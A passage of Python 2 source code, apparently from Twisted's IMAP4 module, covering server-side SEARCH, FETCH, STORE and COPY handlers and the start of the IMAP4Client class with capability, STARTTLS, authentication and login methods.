"""
Pop one search term from the beginning of C{query} (possibly more than
one element) and return whether it matches the given message.
@param query: A list representing the parsed form of the search query.
@param id: The sequence number of the message being checked.
@param msg: The message being checked.
@param lastSequenceId: The highest sequence number of any message in
the mailbox being searched.
@param lastMessageId: The highest UID of any message in the mailbox
being searched.
@return: Boolean indicating whether the query term matched the message.
"""
q = query.pop(0)
if isinstance(q, list):
if not self._searchFilter(q, id, msg,
lastSequenceId, lastMessageId):
return False
else:
c = q.upper()
if not c[:1].isalpha():
# A search term may be a word like ALL, ANSWERED, BCC, etc (see
# below) or it may be a message sequence set. Here we
# recognize a message sequence set "N:M".
messageSet = parseIdList(c, lastSequenceId)
return id in messageSet
else:
f = getattr(self, 'search_' + c, None)
if f is None:
raise IllegalQueryError("Invalid search command %s" % c)
if c in self._requiresLastMessageInfo:
result = f(query, id, msg, (lastSequenceId,
lastMessageId))
else:
result = f(query, id, msg)
if not result:
return False
return True
def search_ALL(self, query, id, msg):
"""
Returns C{True} if the message matches the ALL search key (always).
@type query: A C{list} of C{str}
@param query: A list representing the parsed query string.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
return True
def search_ANSWERED(self, query, id, msg):
"""
Returns C{True} if the message has been answered.
@type query: A C{list} of C{str}
@param query: A list representing the parsed query string.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
return '\\Answered' in msg.getFlags()
def search_BCC(self, query, id, msg):
"""
Returns C{True} if the message has a BCC address matching the query.
@type query: A C{list} of C{str}
@param query: A list whose first element is a BCC C{str}
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
bcc = msg.getHeaders(False, 'bcc').get('bcc', '')
return bcc.lower().find(query.pop(0).lower()) != -1
def search_BEFORE(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) < date
def search_BODY(self, query, id, msg):
body = query.pop(0).lower()
return text.strFile(body, msg.getBodyFile(), False)
def search_CC(self, query, id, msg):
cc = msg.getHeaders(False, 'cc').get('cc', '')
return cc.lower().find(query.pop(0).lower()) != -1
def search_DELETED(self, query, id, msg):
return '\\Deleted' in msg.getFlags()
def search_DRAFT(self, query, id, msg):
return '\\Draft' in msg.getFlags()
def search_FLAGGED(self, query, id, msg):
return '\\Flagged' in msg.getFlags()
def search_FROM(self, query, id, msg):
fm = msg.getHeaders(False, 'from').get('from', '')
return fm.lower().find(query.pop(0).lower()) != -1
def search_HEADER(self, query, id, msg):
hdr = query.pop(0).lower()
hdr = msg.getHeaders(False, hdr).get(hdr, '')
return hdr.lower().find(query.pop(0).lower()) != -1
def search_KEYWORD(self, query, id, msg):
query.pop(0)
return False
def search_LARGER(self, query, id, msg):
return int(query.pop(0)) < msg.getSize()
def search_NEW(self, query, id, msg):
return '\\Recent' in msg.getFlags() and '\\Seen' not in msg.getFlags()
def search_NOT(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message does not match the query.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search query.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
return not self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
def search_OLD(self, query, id, msg):
return '\\Recent' not in msg.getFlags()
def search_ON(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) == date
def search_OR(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message matches any of the first two query
items.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search query.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
a = self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
b = self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
return a or b
def search_RECENT(self, query, id, msg):
return '\\Recent' in msg.getFlags()
def search_SEEN(self, query, id, msg):
return '\\Seen' in msg.getFlags()
def search_SENTBEFORE(self, query, id, msg):
"""
Returns C{True} if the message date is earlier than the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date < parseTime(query.pop(0))
def search_SENTON(self, query, id, msg):
"""
Returns C{True} if the message date is the same as the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date[:3] == parseTime(query.pop(0))[:3]
def search_SENTSINCE(self, query, id, msg):
"""
Returns C{True} if the message date is later than the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date > parseTime(query.pop(0))
def search_SINCE(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) > date
def search_SMALLER(self, query, id, msg):
return int(query.pop(0)) > msg.getSize()
def search_SUBJECT(self, query, id, msg):
subj = msg.getHeaders(False, 'subject').get('subject', '')
return subj.lower().find(query.pop(0).lower()) != -1
def search_TEXT(self, query, id, msg):
# XXX - This must search headers too
body = query.pop(0).lower()
return text.strFile(body, msg.getBodyFile(), False)
def search_TO(self, query, id, msg):
to = msg.getHeaders(False, 'to').get('to', '')
return to.lower().find(query.pop(0).lower()) != -1
def search_UID(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message UID is in the range defined by the
search query.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search
query. Its first element should be a C{str} that can be interpreted
as a sequence range, for example '2:4,5:*'.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
c = query.pop(0)
m = parseIdList(c, lastMessageId)
return msg.getUID() in m
def search_UNANSWERED(self, query, id, msg):
return '\\Answered' not in msg.getFlags()
def search_UNDELETED(self, query, id, msg):
return '\\Deleted' not in msg.getFlags()
def search_UNDRAFT(self, query, id, msg):
return '\\Draft' not in msg.getFlags()
def search_UNFLAGGED(self, query, id, msg):
return '\\Flagged' not in msg.getFlags()
def search_UNKEYWORD(self, query, id, msg):
query.pop(0)
return False
def search_UNSEEN(self, query, id, msg):
return '\\Seen' not in msg.getFlags()
def __ebSearch(self, failure, tag):
self.sendBadResponse(tag, 'SEARCH failed: ' + str(failure.value))
log.err(failure)
def do_FETCH(self, tag, messages, query, uid=0):
if query:
self._oldTimeout = self.setTimeout(None)
maybeDeferred(self.mbox.fetch, messages, uid=uid
).addCallback(iter
).addCallback(self.__cbFetch, tag, query, uid
).addErrback(self.__ebFetch, tag
)
else:
self.sendPositiveResponse(tag, 'FETCH complete')
select_FETCH = (do_FETCH, arg_seqset, arg_fetchatt)
def __cbFetch(self, results, tag, query, uid):
if self.blocked is None:
self.blocked = []
try:
id, msg = results.next()
except StopIteration:
# The idle timeout was suspended while we delivered results,
# restore it now.
self.setTimeout(self._oldTimeout)
del self._oldTimeout
# All results have been processed, deliver completion notification.
# It's important to run this *after* resetting the timeout to "rig
# a race" in some test code. writing to the transport will
# synchronously call test code, which synchronously loses the
# connection, calling our connectionLost method, which cancels the
# timeout. We want to make sure that timeout is cancelled *after*
# we reset it above, so that the final state is no timed
# calls. This avoids reactor uncleanliness errors in the test
# suite.
# XXX: Perhaps loopback should be fixed to not call the user code
# synchronously in transport.write?
self.sendPositiveResponse(tag, 'FETCH completed')
# Instance state is now consistent again (i.e., it is as though
# the fetch command never ran), so allow any pending blocked
# commands to execute.
self._unblock()
else:
self.spewMessage(id, msg, query, uid
).addCallback(lambda _: self.__cbFetch(results, tag, query, uid)
).addErrback(self.__ebSpewMessage
)
def __ebSpewMessage(self, failure):
# This indicates a programming error.
# There's no reliable way to indicate anything to the client, since we
# may have already written an arbitrary amount of data in response to
# the command.
log.err(failure)
self.transport.loseConnection()
def spew_envelope(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('ENVELOPE ' + collapseNestedLists([getEnvelope(msg)]))
def spew_flags(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('FLAGS ' + '(%s)' % (' '.join(msg.getFlags())))
def spew_internaldate(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
idate = msg.getInternalDate()
ttup = rfc822.parsedate_tz(idate)
if ttup is None:
log.msg("%d:%r: unpareseable internaldate: %r" % (id, msg, idate))
raise IMAP4Exception("Internal failure generating INTERNALDATE")
odate = time.strftime("%d-%b-%Y %H:%M:%S ", ttup[:9])
if ttup[9] is None:
odate = odate + "+0000"
else:
if ttup[9] >= 0:
sign = "+"
else:
sign = "-"
odate = odate + sign + string.zfill(str(((abs(ttup[9]) / 3600) * 100 + (abs(ttup[9]) % 3600) / 60)), 4)
_w('INTERNALDATE ' + _quote(odate))
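# Illustrative sketch (comment only): an internal date parsing to
# (1996, 7, 17, 2, 44, 25, ...) with a -25200 second zone offset
# would be written as INTERNALDATE "17-Jul-1996 02:44:25 -0700",
# the fixed-format date form required by RFC 3501.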
def spew_rfc822header(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
hdrs = _formatHeaders(msg.getHeaders(True))
_w('RFC822.HEADER ' + _literal(hdrs))
def spew_rfc822text(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822.TEXT ')
_f()
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
def spew_rfc822size(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822.SIZE ' + str(msg.getSize()))
def spew_rfc822(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822 ')
_f()
mf = IMessageFile(msg, None)
if mf is not None:
return FileProducer(mf.open()
).beginProducing(self.transport
)
return MessageProducer(msg, None, self._scheduler
).beginProducing(self.transport
)
def spew_uid(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('UID ' + str(msg.getUID()))
def spew_bodystructure(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('BODYSTRUCTURE ' + collapseNestedLists([getBodyStructure(msg, True)]))
def spew_body(self, part, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
for p in part.part:
if msg.isMultipart():
msg = msg.getSubPart(p)
elif p > 0:
# Non-multipart messages have an implicit first part but no
# other parts - reject any request for any other part.
raise TypeError("Requested subpart of non-multipart message")
if part.header:
hdrs = msg.getHeaders(part.header.negate, *part.header.fields)
hdrs = _formatHeaders(hdrs)
_w(str(part) + ' ' + _literal(hdrs))
elif part.text:
_w(str(part) + ' ')
_f()
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
elif part.mime:
hdrs = _formatHeaders(msg.getHeaders(True))
_w(str(part) + ' ' + _literal(hdrs))
elif part.empty:
_w(str(part) + ' ')
_f()
if part.part:
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
else:
mf = IMessageFile(msg, None)
if mf is not None:
return FileProducer(mf.open()).beginProducing(self.transport)
return MessageProducer(msg, None, self._scheduler).beginProducing(self.transport)
else:
_w('BODY ' + collapseNestedLists([getBodyStructure(msg)]))
def spewMessage(self, id, msg, query, uid):
wbuf = WriteBuffer(self.transport)
write = wbuf.write
flush = wbuf.flush
def start():
write('* %d FETCH (' % (id,))
def finish():
write(')\r\n')
def space():
write(' ')
def spew():
seenUID = False
start()
for part in query:
if part.type == 'uid':
seenUID = True
if part.type == 'body':
yield self.spew_body(part, id, msg, write, flush)
else:
f = getattr(self, 'spew_' + part.type)
yield f(id, msg, write, flush)
if part is not query[-1]:
space()
if uid and not seenUID:
space()
yield self.spew_uid(id, msg, write, flush)
finish()
flush()
return self._scheduler(spew())
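# Illustrative sketch (comment only): for a FLAGS+UID fetch of
# message 3 the generator above would emit something like
#   * 3 FETCH (FLAGS (\Seen) UID 42)
# writing each part through the shared WriteBuffer and flushing once
# the closing parenthesis is out.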
def __ebFetch(self, failure, tag):
self.setTimeout(self._oldTimeout)
del self._oldTimeout
log.err(failure)
self.sendBadResponse(tag, 'FETCH failed: ' + str(failure.value))
def do_STORE(self, tag, messages, mode, flags, uid=0):
mode = mode.upper()
silent = mode.endswith('SILENT')
if mode.startswith('+'):
mode = 1
elif mode.startswith('-'):
mode = -1
else:
mode = 0
maybeDeferred(self.mbox.store, messages, flags, mode, uid=uid).addCallbacks(
self.__cbStore, self.__ebStore, (tag, self.mbox, uid, silent), None, (tag,), None
)
select_STORE = (do_STORE, arg_seqset, arg_atom, arg_flaglist)
def __cbStore(self, result, tag, mbox, uid, silent):
if result and not silent:
for (k, v) in result.iteritems():
if uid:
uidstr = ' UID %d' % mbox.getUID(k)
else:
uidstr = ''
self.sendUntaggedResponse('%d FETCH (FLAGS (%s)%s)' %
(k, ' '.join(v), uidstr))
self.sendPositiveResponse(tag, 'STORE completed')
def __ebStore(self, failure, tag):
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
def do_COPY(self, tag, messages, mailbox, uid=0):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox
).addCallback(self._cbCopySelectedMailbox, tag, messages, mailbox, uid
).addErrback(self._ebCopySelectedMailbox, tag
)
select_COPY = (do_COPY, arg_seqset, arg_astring)
def _cbCopySelectedMailbox(self, mbox, tag, messages, mailbox, uid):
if not mbox:
self.sendNegativeResponse(tag, 'No such mailbox: ' + mailbox)
else:
maybeDeferred(self.mbox.fetch, messages, uid
).addCallback(self.__cbCopy, tag, mbox
).addCallback(self.__cbCopied, tag, mbox
).addErrback(self.__ebCopy, tag
)
def _ebCopySelectedMailbox(self, failure, tag):
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
def __cbCopy(self, messages, tag, mbox):
# XXX - This should handle failures with a rollback or something
addedDeferreds = []
addedIDs = []
failures = []
fastCopyMbox = IMessageCopier(mbox, None)
for (id, msg) in messages:
if fastCopyMbox is not None:
d = maybeDeferred(fastCopyMbox.copy, msg)
addedDeferreds.append(d)
continue
# XXX - The following should be an implementation of IMessageCopier.copy
# on an IMailbox->IMessageCopier adapter.
flags = msg.getFlags()
date = msg.getInternalDate()
body = IMessageFile(msg, None)
if body is not None:
bodyFile = body.open()
d = maybeDeferred(mbox.addMessage, bodyFile, flags, date)
else:
def rewind(f):
f.seek(0)
return f
buffer = tempfile.TemporaryFile()
d = MessageProducer(msg, buffer, self._scheduler
).beginProducing(None
).addCallback(lambda _, b=buffer, f=flags, d=date: mbox.addMessage(rewind(b), f, d)
)
addedDeferreds.append(d)
return defer.DeferredList(addedDeferreds)
def __cbCopied(self, deferredIds, tag, mbox):
ids = []
failures = []
for (status, result) in deferredIds:
if status:
ids.append(result)
else:
failures.append(result.value)
if failures:
self.sendNegativeResponse(tag, '[ALERT] Some messages were not copied')
else:
self.sendPositiveResponse(tag, 'COPY completed')
def __ebCopy(self, failure, tag):
self.sendBadResponse(tag, 'COPY failed: ' + str(failure.value))
log.err(failure)
def do_UID(self, tag, command, line):
command = command.upper()
if command not in ('COPY', 'FETCH', 'STORE', 'SEARCH'):
raise IllegalClientResponse(command)
self.dispatchCommand(tag, command, line, uid=1)
select_UID = (do_UID, arg_atom, arg_line)
#
# IMailboxListener implementation
#
def modeChanged(self, writeable):
if writeable:
self.sendUntaggedResponse(message='[READ-WRITE]', async=True)
else:
self.sendUntaggedResponse(message='[READ-ONLY]', async=True)
def flagsChanged(self, newFlags):
for (mId, flags) in newFlags.iteritems():
msg = '%d FETCH (FLAGS (%s))' % (mId, ' '.join(flags))
self.sendUntaggedResponse(msg, async=True)
def newMessages(self, exists, recent):
if exists is not None:
self.sendUntaggedResponse('%d EXISTS' % exists, async=True)
if recent is not None:
self.sendUntaggedResponse('%d RECENT' % recent, async=True)
class UnhandledResponse(IMAP4Exception): pass
class NegativeResponse(IMAP4Exception): pass
class NoSupportedAuthentication(IMAP4Exception):
def __init__(self, serverSupports, clientSupports):
IMAP4Exception.__init__(self, 'No supported authentication schemes available')
self.serverSupports = serverSupports
self.clientSupports = clientSupports
def __str__(self):
return (IMAP4Exception.__str__(self)
+ ': Server supports %r, client supports %r'
% (self.serverSupports, self.clientSupports))
class IllegalServerResponse(IMAP4Exception): pass
TIMEOUT_ERROR = error.TimeoutError()
class IMAP4Client(basic.LineReceiver, policies.TimeoutMixin):
"""IMAP4 client protocol implementation
@ivar state: A string representing the state the connection is currently
in.
"""
implements(IMailboxListener)
tags = None
waiting = None
queued = None
tagID = 1
state = None
startedTLS = False
# Number of seconds to wait before timing out a connection.
# If the number is <= 0 no timeout checking will be performed.
timeout = 0
# Capabilities are not allowed to change during the session
# So cache the first response and use that for all later
# lookups
_capCache = None
_memoryFileLimit = 1024 * 1024 * 10
# Authentication is pluggable. This maps names to IClientAuthentication
# objects.
authenticators = None
STATUS_CODES = ('OK', 'NO', 'BAD', 'PREAUTH', 'BYE')
STATUS_TRANSFORMATIONS = {
'MESSAGES': int, 'RECENT': int, 'UNSEEN': int
}
context = None
def __init__(self, contextFactory = None):
self.tags = {}
self.queued = []
self.authenticators = {}
self.context = contextFactory
self._tag = None
self._parts = None
self._lastCmd = None
def registerAuthenticator(self, auth):
"""Register a new form of authentication
When invoking the authenticate() method of IMAP4Client, the first
matching authentication scheme found will be used. The ordering is
that in which the server lists supported authentication schemes.
@type auth: Implementor of C{IClientAuthentication}
@param auth: The object to use to perform the client
side of this authentication scheme.
"""
self.authenticators[auth.getName().upper()] = auth
def rawDataReceived(self, data):
if self.timeout > 0:
self.resetTimeout()
self._pendingSize -= len(data)
if self._pendingSize > 0:
self._pendingBuffer.write(data)
else:
passon = ''
if self._pendingSize < 0:
data, passon = data[:self._pendingSize], data[self._pendingSize:]
self._pendingBuffer.write(data)
rest = self._pendingBuffer
self._pendingBuffer = None
self._pendingSize = None
rest.seek(0, 0)
self._parts.append(rest.read())
self.setLineMode(passon.lstrip('\r\n'))
# def sendLine(self, line):
# print 'S:', repr(line)
# return basic.LineReceiver.sendLine(self, line)
def _setupForLiteral(self, rest, octets):
self._pendingBuffer = self.messageFile(octets)
self._pendingSize = octets
if self._parts is None:
self._parts = [rest, '\r\n']
else:
self._parts.extend([rest, '\r\n'])
self.setRawMode()
def connectionMade(self):
if self.timeout > 0:
self.setTimeout(self.timeout)
def connectionLost(self, reason):
"""We are no longer connected"""
if self.timeout > 0:
self.setTimeout(None)
if self.queued is not None:
queued = self.queued
self.queued = None
for cmd in queued:
cmd.defer.errback(reason)
if self.tags is not None:
tags = self.tags
self.tags = None
for cmd in tags.itervalues():
if cmd is not None and cmd.defer is not None:
cmd.defer.errback(reason)
def lineReceived(self, line):
"""
Attempt to parse a single line from the server.
@type line: C{str}
@param line: The line from the server, without the line delimiter.
@raise IllegalServerResponse: If the line or some part of the line
does not represent an allowed message from the server at this time.
"""
# print 'C: ' + repr(line)
if self.timeout > 0:
self.resetTimeout()
lastPart = line.rfind('{')
if lastPart != -1:
lastPart = line[lastPart + 1:]
if lastPart.endswith('}'):
# It's a literal a-comin' in
try:
octets = int(lastPart[:-1])
except ValueError:
raise IllegalServerResponse(line)
if self._parts is None:
self._tag, parts = line.split(None, 1)
else:
parts = line
self._setupForLiteral(parts, octets)
return
if self._parts is None:
# It isn't a literal at all
self._regularDispatch(line)
else:
# If an expression is in progress, no tag is required here
# Since we didn't find a literal indicator, this expression
# is done.
self._parts.append(line)
tag, rest = self._tag, ''.join(self._parts)
self._tag = self._parts = None
self.dispatchCommand(tag, rest)
def timeoutConnection(self):
if self._lastCmd and self._lastCmd.defer is not None:
d, self._lastCmd.defer = self._lastCmd.defer, None
d.errback(TIMEOUT_ERROR)
if self.queued:
for cmd in self.queued:
if cmd.defer is not None:
d, cmd.defer = cmd.defer, None
d.errback(TIMEOUT_ERROR)
self.transport.loseConnection()
def _regularDispatch(self, line):
parts = line.split(None, 1)
if len(parts) != 2:
parts.append('')
tag, rest = parts
self.dispatchCommand(tag, rest)
def messageFile(self, octets):
"""Create a file to which an incoming message may be written.
@type octets: C{int}
@param octets: The number of octets which will be written to the file
@rtype: Any object which implements C{write(string)} and
C{seek(int, int)}
@return: A file-like object
"""
if octets > self._memoryFileLimit:
return tempfile.TemporaryFile()
else:
return StringIO.StringIO()
def makeTag(self):
tag = '%0.4X' % self.tagID
self.tagID += 1
return tag
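# Illustrative sketch (comment only): successive calls produce the
# four-digit hex tags '0001', '0002', ... used to correlate each
# command with its tagged server response.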
def dispatchCommand(self, tag, rest):
if self.state is None:
f = self.response_UNAUTH
else:
f = getattr(self, 'response_' + self.state.upper(), None)
if f:
try:
f(tag, rest)
except:
log.err()
self.transport.loseConnection()
else:
log.err("Cannot dispatch: %s, %s, %s" % (self.state, tag, rest))
self.transport.loseConnection()
def response_UNAUTH(self, tag, rest):
if self.state is None:
# This is the server greeting.
status, rest = rest.split(None, 1)
if status.upper() == 'OK':
self.state = 'unauth'
elif status.upper() == 'PREAUTH':
self.state = 'auth'
else:
# XXX - This is rude.
self.transport.loseConnection()
raise IllegalServerResponse(tag + ' ' + rest)
b, e = rest.find('['), rest.find(']')
if b != -1 and e != -1:
self.serverGreeting(
self.__cbCapabilities(
([parseNestedParens(rest[b + 1:e])], None)))
else:
self.serverGreeting(None)
else:
self._defaultHandler(tag, rest)
def response_AUTH(self, tag, rest):
self._defaultHandler(tag, rest)
def _defaultHandler(self, tag, rest):
if tag == '*' or tag == '+':
if not self.waiting:
self._extraInfo([parseNestedParens(rest)])
else:
cmd = self.tags[self.waiting]
if tag == '+':
cmd.continuation(rest)
else:
cmd.lines.append(rest)
else:
try:
cmd = self.tags[tag]
except KeyError:
# XXX - This is rude.
self.transport.loseConnection()
raise IllegalServerResponse(tag + ' ' + rest)
else:
status, line = rest.split(None, 1)
if status == 'OK':
# Give them this last line, too
cmd.finish(rest, self._extraInfo)
else:
cmd.defer.errback(IMAP4Exception(line))
del self.tags[tag]
self.waiting = None
self._flushQueue()
def _flushQueue(self):
if self.queued:
cmd = self.queued.pop(0)
t = self.makeTag()
self.tags[t] = cmd
self.sendLine(cmd.format(t))
self.waiting = t
def _extraInfo(self, lines):
# XXX - This is terrible.
# XXX - Also, this should collapse temporally proximate calls into single
# invocations of IMailboxListener methods, where possible.
flags = {}
recent = exists = None
for response in lines:
elements = len(response)
if elements == 1 and response[0] == ['READ-ONLY']:
self.modeChanged(False)
elif elements == 1 and response[0] == ['READ-WRITE']:
self.modeChanged(True)
elif elements == 2 and response[1] == 'EXISTS':
exists = int(response[0])
elif elements == 2 and response[1] == 'RECENT':
recent = int(response[0])
elif elements == 3 and response[1] == 'FETCH':
mId = int(response[0])
values = self._parseFetchPairs(response[2])
flags.setdefault(mId, []).extend(values.get('FLAGS', ()))
else:
log.msg('Unhandled unsolicited response: %s' % (response,))
if flags:
self.flagsChanged(flags)
if recent is not None or exists is not None:
self.newMessages(exists, recent)
def sendCommand(self, cmd):
cmd.defer = defer.Deferred()
if self.waiting:
self.queued.append(cmd)
return cmd.defer
t = self.makeTag()
self.tags[t] = cmd
self.sendLine(cmd.format(t))
self.waiting = t
self._lastCmd = cmd
return cmd.defer
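# Illustrative sketch (comment only): because only one command may be
# outstanding at a time, a second sendCommand issued while `waiting`
# is set just queues the Command; _flushQueue sends it when the
# tagged response for the first command arrives.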
def getCapabilities(self, useCache=1):
"""Request the capabilities available on this server.
This command is allowed in any state of connection.
@type useCache: C{bool}
@param useCache: Specify whether to use the capability-cache or to
re-retrieve the capabilities from the server. Server capabilities
should never change, so for normal use, this flag should never be
false.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a
dictionary mapping capability types to lists of supported
mechanisms, or to None if a support list is not applicable.
"""
if useCache and self._capCache is not None:
return defer.succeed(self._capCache)
cmd = 'CAPABILITY'
resp = ('CAPABILITY',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbCapabilities)
return d
def __cbCapabilities(self, (lines, tagline)):
caps = {}
for rest in lines:
for cap in rest[1:]:
parts = cap.split('=', 1)
if len(parts) == 1:
category, value = parts[0], None
else:
category, value = parts
caps.setdefault(category, []).append(value)
# Preserve a non-ideal API for backwards compatibility. It would
# probably be entirely sensible to have an object with a wider API than
# dict here so this could be presented less insanely.
for category in caps:
if caps[category] == [None]:
caps[category] = None
self._capCache = caps
return caps
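# Illustrative sketch (comment only): the untagged response
# 'CAPABILITY IMAP4rev1 IDLE AUTH=LOGIN AUTH=PLAIN' is folded into
# {'IMAP4rev1': None, 'IDLE': None, 'AUTH': ['LOGIN', 'PLAIN']}.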
def logout(self):
"""Inform the server that we are done with the connection.
This command is allowed in any state of connection.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with None
when the proper server acknowledgement has been received.
"""
d = self.sendCommand(Command('LOGOUT', wantResponse=('BYE',)))
d.addCallback(self.__cbLogout)
return d
def __cbLogout(self, (lines, tagline)):
self.transport.loseConnection()
# We don't particularly care what the server said
return None
def noop(self):
"""Perform no operation.
This command is allowed in any state of connection.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a list
of untagged status updates the server responds with.
"""
d = self.sendCommand(Command('NOOP'))
d.addCallback(self.__cbNoop)
return d
def __cbNoop(self, (lines, tagline)):
# Conceivably, this is elidable.
# It is, after all, a no-op.
return lines
def startTLS(self, contextFactory=None):
"""
Initiates a 'STARTTLS' request and negotiates the TLS / SSL
Handshake.
@param contextFactory: The TLS / SSL Context Factory to
leverage. If the contextFactory is None the IMAP4Client will
either use the current TLS / SSL Context Factory or attempt to
create a new one.
@type contextFactory: C{ssl.ClientContextFactory}
@return: A Deferred which fires when the transport has been
secured according to the given contextFactory, or which fails
if the transport cannot be secured.
"""
assert not self.startedTLS, "Client and Server are currently communicating via TLS"
if contextFactory is None:
contextFactory = self._getContextFactory()
if contextFactory is None:
return defer.fail(IMAP4Exception(
"IMAP4Client requires a TLS context to "
"initiate the STARTTLS handshake"))
if 'STARTTLS' not in self._capCache:
return defer.fail(IMAP4Exception(
"Server does not support secure communication "
"via TLS / SSL"))
tls = interfaces.ITLSTransport(self.transport, None)
if tls is None:
return defer.fail(IMAP4Exception(
"IMAP4Client transport does not implement "
"interfaces.ITLSTransport"))
d = self.sendCommand(Command('STARTTLS'))
d.addCallback(self._startedTLS, contextFactory)
d.addCallback(lambda _: self.getCapabilities())
return d
def authenticate(self, secret):
"""Attempt to enter the authenticated state with the server
This command is allowed in the Non-Authenticated state.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the authentication
succeeds and whose errback will be invoked otherwise.
"""
if self._capCache is None:
d = self.getCapabilities()
else:
d = defer.succeed(self._capCache)
d.addCallback(self.__cbAuthenticate, secret)
return d
def __cbAuthenticate(self, caps, secret):
auths = caps.get('AUTH', ())
for scheme in auths:
if scheme.upper() in self.authenticators:
cmd = Command('AUTHENTICATE', scheme, (),
self.__cbContinueAuth, scheme,
secret)
return self.sendCommand(cmd)
if self.startedTLS:
return defer.fail(NoSupportedAuthentication(
auths, self.authenticators.keys()))
else:
def ebStartTLS(err):
err.trap(IMAP4Exception)
# We couldn't negotiate TLS for some reason
return defer.fail(NoSupportedAuthentication(
auths, self.authenticators.keys()))
d = self.startTLS()
d.addErrback(ebStartTLS)
d.addCallback(lambda _: self.getCapabilities())
d.addCallback(self.__cbAuthTLS, secret)
return d
def __cbContinueAuth(self, rest, scheme, secret):
try:
chal = base64.decodestring(rest + '\n')
except binascii.Error:
self.sendLine('*')
self.transport.loseConnection()
raise IllegalServerResponse(rest)
else:
auth = self.authenticators[scheme]
chal = auth.challengeResponse(secret, chal)
self.sendLine(base64.encodestring(chal).strip())
def __cbAuthTLS(self, caps, secret):
auths = caps.get('AUTH', ())
for scheme in auths:
if scheme.upper() in self.authenticators:
cmd = Command('AUTHENTICATE', scheme, (),
self.__cbContinueAuth, scheme,
secret)
return self.sendCommand(cmd)
raise NoSupportedAuthentication(auths, self.authenticators.keys())
def login(self, username, password):
"""Authenticate with the server using a username and password
This command is allowed in the Non-Authenticated state. If the
server supports the STARTTLS capability and our transport supports
TLS, TLS is negotiated before the login command is issued.
A more secure way to log in is to use C{startTLS} or
C{authenticate} or both.
@type username: C{str}
@param username: The username to log in with
@type password: C{str}
@param password: The password to log in with
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if login is successful
and whose errback is invoked otherwise.
"""
d = maybeDeferred(self.getCapabilities)
d.addCallback(self.__cbLoginCaps, username, password)
return d
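# Illustrative usage (comment only, assumes a connected IMAP4Client
# instance `proto`; names are hypothetical):
#   d = proto.login('alice', 'secret')
#   d.addCallback(lambda _: proto.select('INBOX'))
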